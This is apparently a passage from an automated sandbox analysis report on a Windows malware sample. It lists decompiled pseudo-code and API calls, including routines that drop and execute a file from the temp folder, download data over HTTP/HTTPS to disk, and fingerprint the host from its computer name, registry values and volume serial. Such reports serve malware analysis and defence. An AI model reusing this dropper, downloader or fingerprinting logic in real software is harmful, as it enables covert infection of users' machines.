							E004013B4(0x40b510, _v16);
							_t67 =  *0x40b510; // 0x0
							E004012B8(_t67, _v16, _v12);
							 *0x40b514 = _v16;
							 *0x40be1c = 0;
							wsprintfA("1530474054", 0x4084a0, _v24);
						} else {
							E0040485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t78 =  *0x40a174; // 0x401e10
								E00407290(_t78);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}



















    0x004082f4
    0x004082f6
    0x00408301
    0x00408304
    0x00408307
    0x0040830c
    0x00408317
    0x00408325
    0x0040832a
    0x00408338
    0x00408481
    0x00408486
    0x0040833e
    0x0040834b
    0x0040834e
    0x00408352
    0x00408364
    0x00408370
    0x00408380
    0x00408393
    0x004083a7
    0x004083af
    0x004083bc
    0x004083cb
    0x0040842d
    0x00408432
    0x00408437
    0x00408444
    0x0040844f
    0x00408454
    0x0040845c
    0x00408461
    0x00408476
    0x004083cd
    0x004083d9
    0x004083e3
    0x00408414
    0x0040841f
    0x00408424
    0x00408416
    0x00408416
    0x00408416
    0x00408414
    0x004083cb
    0x00408352
    0x00408491

    APIs
      • Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
      • Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • GetTempPathA.KERNEL32(00000201,?), ref: 00408364
    • wsprintfA.USER32 ref: 00408476
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
    • Sleep.KERNEL32(000005DC), ref: 004083E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00425D81, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
    APIs
    • RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
    • TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC
    • RtlDeleteCriticalSection.NTDLL(00000000), ref: 0042BF78
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RtlDeleteCriticalSection.NTDLL(00442050), ref: 0042BFA2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0040485C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46file
    C-Code - Quality: 100%
    			E0040485C(CHAR* __eax, long __ecx, void* __edx) {
				CHAR* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_v24 != 0xffffffff) {
					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) {
						_v20 = 0xffffffff;
					}
					FlushFileBuffers(_v24);
					CloseHandle(_v24);
				}
				return _v20;
			}









    0x00404862
    0x00404865
    0x00404868
    0x0040486d
    0x0040488c
    0x00404893
    0x004048af
    0x004048b9
    0x004048b9
    0x004048c4
    0x004048ce
    0x004048ce
    0x004048da

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
    • FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
    • CloseHandle.KERNEL32(000000FF), ref: 004048CE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0041FD50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42string
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00410AE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36library
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 00410AE6
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00410B11
    • FreeLibrary.KERNEL32(00000000), ref: 00410B21
    • FreeLibrary.KERNEL32(00000000), ref: 00410B32
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411BB0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33library
    APIs
    • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 00411BD3
    • GetProcAddress.KERNEL32(?,OpenThemeData), ref: 00411BF8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042580D, Relevance: 7.6, APIs: 5, Instructions: 116
    APIs
    • __getptd.LIBCMT ref: 0042581D
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425504: __getptd.LIBCMT ref: 00425510
      • Part of subcall function 00425504: __amsg_exit.LIBCMT ref: 00425530
      • Part of subcall function 00425504: InterlockedDecrement.KERNEL32(?), ref: 0042555D
      • Part of subcall function 00425504: InterlockedIncrement.KERNEL32(00441D00), ref: 00425588
      • Part of subcall function 004255A8: GetOEMCP.KERNEL32(00000000), ref: 004255D1
      • Part of subcall function 004255A8: GetACP.KERNEL32(00000000), ref: 004255F4
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • InterlockedDecrement.KERNEL32(?), ref: 00425883
    • InterlockedIncrement.KERNEL32(00000000), ref: 004258A8
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • InterlockedDecrement.KERNEL32 ref: 0042593A
    • InterlockedIncrement.KERNEL32(00000000), ref: 0042595E
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00415980, Relevance: 7.6, APIs: 5, Instructions: 104
    APIs
      • Part of subcall function 00414300: GetVersionExA.KERNEL32(?), ref: 00414333
      • Part of subcall function 00414300: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 00414376
      • Part of subcall function 00414300: GetObjectA.GDI32(?,0000003C,?), ref: 004143AA
      • Part of subcall function 00414300: lstrcmp.KERNEL32(?,?), ref: 00414476
      • Part of subcall function 00414300: CreateFontIndirectA.GDI32(?), ref: 00414488
      • Part of subcall function 00414300: DeleteObject.GDI32(?), ref: 004144A9
      • Part of subcall function 00414300: DeleteObject.GDI32(?), ref: 004144C4
      • Part of subcall function 00414300: SendMessageA.USER32(?,00000030,00000000,00000001), ref: 004144DB
      • Part of subcall function 00414300: SendMessageA.USER32(?,0000041C,00000000,00436330), ref: 004144EC
      • Part of subcall function 00414300: SendMessageA.USER32(?,00000421,00000000,00000000), ref: 004144F9
      • Part of subcall function 00414300: SelectObject.GDI32(00000000,?), ref: 00414519
      • Part of subcall function 00414300: DrawTextA.USER32(00000000,0043632C,000000FF,?,00000424), ref: 00414541
      • Part of subcall function 00414300: SetRectEmpty.USER32(?), ref: 00414559
      • Part of subcall function 00414300: DrawTextA.USER32(00000000,00436328,000000FF,?,00000424), ref: 00414571
      • Part of subcall function 00414300: SelectObject.GDI32(00000000,00000000), ref: 00414593
      • Part of subcall function 00414300: GetVersionExA.KERNEL32(?), ref: 004145C6
      • Part of subcall function 00414300: SystemParametersInfoA.USER32 ref: 004145EE
      • Part of subcall function 00414300: SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0041465D
      • Part of subcall function 00414300: GetVersionExA.KERNEL32(?), ref: 004146A8
    • GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
    • SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
    • GetSystemMetrics.USER32(00000031), ref: 00415A10
    • GetSystemMetrics.USER32(00000032), ref: 00415A1A
    • GetClientRect.USER32 ref: 00415AB9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041E580, Relevance: 7.6, APIs: 5, Instructions: 100window
    APIs
    • SendMessageA.USER32(?,00000401,?,0000FFFF), ref: 0041E612
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0041E626
    • SendMessageA.USER32(?,00000405,?), ref: 0041E63A
    • SendMessageA.USER32(?,00000403,?), ref: 0041E64E
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041E6A9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411F60, Relevance: 7.6, APIs: 5, Instructions: 98window
    APIs
    • GetWindowRect.USER32(?,?), ref: 00411FAE
      • Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
      • Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?), ref: 00412035
    • GetSystemMenu.USER32(?,00000000), ref: 0041204A
    • GetMenuDefaultItem.USER32(00000000,00000000,00000000), ref: 00412055
    • SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00412074
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041F120, Relevance: 7.6, APIs: 5, Instructions: 65
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042A52B, Relevance: 7.5, APIs: 5, Instructions: 49LIBRARYCODE
    APIs
    • __CreateFrameInfo.LIBCMT ref: 0042A553
      • Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241B9
      • Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241C7
    • __getptd.LIBCMT ref: 0042A55D
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A56B
    • __getptd.LIBCMT ref: 0042A579
    • __getptd.LIBCMT ref: 0042A584
      • Part of subcall function 00424250: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042429C
      • Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A660
      • Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A66E
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00423C45, Relevance: 7.5, APIs: 5, Instructions: 47thread
    APIs
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
      • Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
      • Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • ___fls_getvalue@4.LIBCMT ref: 00423C62
      • Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E
    • ___fls_setvalue@8.LIBCMT ref: 00423C75
      • Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
    • RtlExitUserThread.NTDLL(00000000), ref: 00423C85
    • GetCurrentThreadId.KERNEL32 ref: 00423C8B
    • __getptd.LIBCMT ref: 00423CF4
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041E110, Relevance: 7.5, APIs: 5, Instructions: 37string
    APIs
    • BeginPaint.USER32 ref: 0041E12D
    • lstrlen.KERNEL32(?), ref: 0041E141
    • lstrlen.KERNEL32(?), ref: 0041E149
    • TextOutA.GDI32(?,0000000A,0000000A,?,00000000), ref: 0041E156
    • EndPaint.USER32(?,00000000), ref: 0041E166
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00403C26, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176file
    C-Code - Quality: 98%
    			E00403C26(intOrPtr __eax, void* __ecx, CHAR* __edx) {
				intOrPtr _v8;
				CHAR* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _v68;
				signed int _v72;
				char _v201;
				char _v458;
				void _v1483;
				signed int _t88;
				intOrPtr _t93;
				void* _t94;
				intOrPtr _t162;
				intOrPtr _t165;
				void* _t176;
				void* _t178;
				void* _t185;

				_t176 = _t178;
				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				_t181 =  *0x40b7a4;
				if( *0x40b7a4 == 0) {
					E00403A04(_t181);
				}
				_t162 =  *0x40a1a4; // 0x401ec0
				_t88 = E00401110(_v8, _t162);
				asm("sbb eax, eax");
				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
				_v56 = E00401110(_v8, E00403E98);
				if(_v56 != 0) {
					_v56 = _v56 + 2;
					_v60 = E00401110(_v56, 0x403e9c);
					_v32 = _v60 - _v56;
					E004012B8( &_v201, _v32, _v56);
					 *((char*)(_t176 + _v32 - 0xc5)) = 0;
					E00401308( &_v458, _v60);
				}
				_t93 =  *0x40a298; // 0x0
				_t94 = _t93 - 1;
				_t185 = _t94;
				if(_t185 < 0) {
					_v64 = 0;
				} else {
					if(_t185 == 0) {
						_v64 = 0;
					} else {
						if(_t94 == 1) {
							_v64 = 1;
						}
					}
				}
				_v20 = E00403864(0x40b7a4, _v64, 0, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x50;
				} else {
					_v72 = 0x1bb;
				}
				_v24 = E0040161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
				if(_v68 == 0) {
					_v72 = 0x4400000;
				} else {
					_v72 = 0x4c03000;
				}
				_t165 =  *0x40a244; // 0x4020b8
				_v28 = E00401660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
				if(_v68 != 0) {
					_v32 = 4;
					E004016D8(_v28,  &_v72, 0x1f,  &_v32);
					_v72 = _v72 | 0x00000100;
					E0040170C(_v28,  &_v72, 0x1f, 4);
				}
				E004015E4(_v28, 0, 0, 0, 0);
				_v32 = 4;
				_v36 = 0;
				_v40 = 0;
				E004039CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
				if(_v36 != 0xc8) {
					L25:
					E0040151C(_v28);
					E0040151C(_v24);
					E0040151C(_v20);
					return _v16;
				} else {
					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_v52 == 0xffffffff) {
						goto L25;
					} else {
						goto L22;
					}
					do {
						L22:
						_v44 = E004016A4(_v28, 0,  &_v32, 0);
						E004015B0(_v28, 0x401,  &_v1483,  &_v32);
						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
					} while (_v32 != 0 || _v44 == 0);
					CloseHandle(_v52);
					_v16 = 0xffffffff;
					goto L25;
				}
			}































    0x00403c29
    0x00403c31
    0x00403c34
    0x00403c39
    0x00403c3c
    0x00403c43
    0x00403c45
    0x00403c45
    0x00403c4a
    0x00403c53
    0x00403c60
    0x00403c62
    0x00403c72
    0x00403c79
    0x00403c81
    0x00403c91
    0x00403c9a
    0x00403ca9
    0x00403cb1
    0x00403cc2
    0x00403cc2
    0x00403cc7
    0x00403ccc
    0x00403ccc
    0x00403ccf
    0x00403cda
    0x00403cd1
    0x00403cd1
    0x00403ce1
    0x00403cd3
    0x00403cd4
    0x00403ce6
    0x00403ce6
    0x00403cd4
    0x00403cd1
    0x00403d01
    0x00403d08
    0x00403d13
    0x00403d0a
    0x00403d0a
    0x00403d0a
    0x00403d36
    0x00403d3d
    0x00403d48
    0x00403d3f
    0x00403d3f
    0x00403d3f
    0x00403d61
    0x00403d6f
    0x00403d76
    0x00403d78
    0x00403d8e
    0x00403d93
    0x00403da7
    0x00403da7
    0x00403db7
    0x00403dbc
    0x00403dc5
    0x00403dca
    0x00403de0
    0x00403dec
    0x00403e78
    0x00403e7b
    0x00403e83
    0x00403e8b
    0x00403e96
    0x00403df2
    0x00403e0e
    0x00403e15
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00403e17
    0x00403e17
    0x00403e26
    0x00403e3b
    0x00403e55
    0x00403e5b
    0x00403e6b
    0x00403e71
    0x00000000
    0x00403e71

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
    • CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00404BA0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176registry
    C-Code - Quality: 100%
    			E00404BA0(intOrPtr* __eax) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				signed int _v41;
				char _v298;
				char* _t78;
				intOrPtr _t82;
				intOrPtr _t87;
				intOrPtr _t92;
				intOrPtr _t98;
				CHAR* _t109;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_t78 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36);
				_v12 = 0x101;
				_t82 =  *0x40a0e4; // 0x401d14
				if(E004038B0(_v36, _t82, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t87 =  *0x40a0e8; // 0x401d20
				if(E004038B0(_v36, _t87, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t92 =  *0x40a0ec; // 0x401d2c
				if(E004038B0(_v36, _t92, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t98 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v36, _t98, 0, 0,  &_v20,  &_v12);
				E00403890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t109 =  *0x40a268; // 0x4021d0
				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
				_v32 = _v20 ^ _v28 ^ _v24;
				E00401164(_v32,  &_v298);
				E00401308(_v8,  &_v298);
				E00401164(_v16,  &_v298);
				E0040133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E0040118C( *_v40);
					_v40 = _v40 + 2;
				}
				E00401164(_v41,  &_v298);
				return E0040133C(_v8,  &(( &_v298)[6]));
			}




















    0x00404ba9
    0x00404bae
    0x00404bb1
    0x00404bcb
    0x00404be8
    0x00404be8
    0x00404bf6
    0x00404c01
    0x00404c07
    0x00404c1d
    0x00404c31
    0x00404c4e
    0x00404c4e
    0x00404c51
    0x00404c67
    0x00404c7b
    0x00404c98
    0x00404c98
    0x00404c9b
    0x00404cb1
    0x00404cc5
    0x00404ce2
    0x00404ce2
    0x00404ce5
    0x00404cee
    0x00404cfd
    0x00404d07
    0x00404d12
    0x00404d19
    0x00404d1e
    0x00404d23
    0x00404d3a
    0x00404d40
    0x00404d4f
    0x00404d5b
    0x00404d69
    0x00404d77
    0x00404d87
    0x00404d92
    0x00404d95
    0x00404dad
    0x00404da6
    0x00404da9
    0x00404da9
    0x00404dc0
    0x00404dde

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
    • RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    • GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00404B9B, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173registry
    C-Code - Quality: 100%
    			E00404B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				signed int _v41;
				char _v298;
				char* _t80;
				intOrPtr _t84;
				intOrPtr _t89;
				intOrPtr _t94;
				intOrPtr _t100;
				CHAR* _t111;

				_a122 = _a122 + __edx;
				 *__eax =  *__eax + __eax;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_t80 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36);
				_v12 = 0x101;
				_t84 =  *0x40a0e4; // 0x401d14
				if(E004038B0(_v36, _t84, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t89 =  *0x40a0e8; // 0x401d20
				if(E004038B0(_v36, _t89, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t94 =  *0x40a0ec; // 0x401d2c
				if(E004038B0(_v36, _t94, 0, 0,  &_v298,  &_v12) == 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t100 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v36, _t100, 0, 0,  &_v20,  &_v12);
				E00403890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t111 =  *0x40a268; // 0x4021d0
				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
				_v32 = _v20 ^ _v28 ^ _v24;
				E00401164(_v32,  &_v298);
				E00401308(_v8,  &_v298);
				E00401164(_v16,  &_v298);
				E0040133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E0040118C( *_v40);
					_v40 = _v40 + 2;
				}
				E00401164(_v41,  &_v298);
				return E0040133C(_v8,  &(( &_v298)[6]));
			}




















    0x00404b9b
    0x00404b9e
    0x00404ba9
    0x00404bae
    0x00404bb1
    0x00404bcb
    0x00404be8
    0x00404be8
    0x00404bf6
    0x00404c01
    0x00404c07
    0x00404c1d
    0x00404c31
    0x00404c4e
    0x00404c4e
    0x00404c51
    0x00404c67
    0x00404c7b
    0x00404c98
    0x00404c98
    0x00404c9b
    0x00404cb1
    0x00404cc5
    0x00404ce2
    0x00404ce2
    0x00404ce5
    0x00404cee
    0x00404cfd
    0x00404d07
    0x00404d12
    0x00404d19
    0x00404d1e
    0x00404d23
    0x00404d3a
    0x00404d40
    0x00404d4f
    0x00404d5b
    0x00404d69
    0x00404d77
    0x00404d87
    0x00404d92
    0x00404d95
    0x00404dad
    0x00404da6
    0x00404da9
    0x00404da9
    0x00404dc0
    0x00404dde

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
    • RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
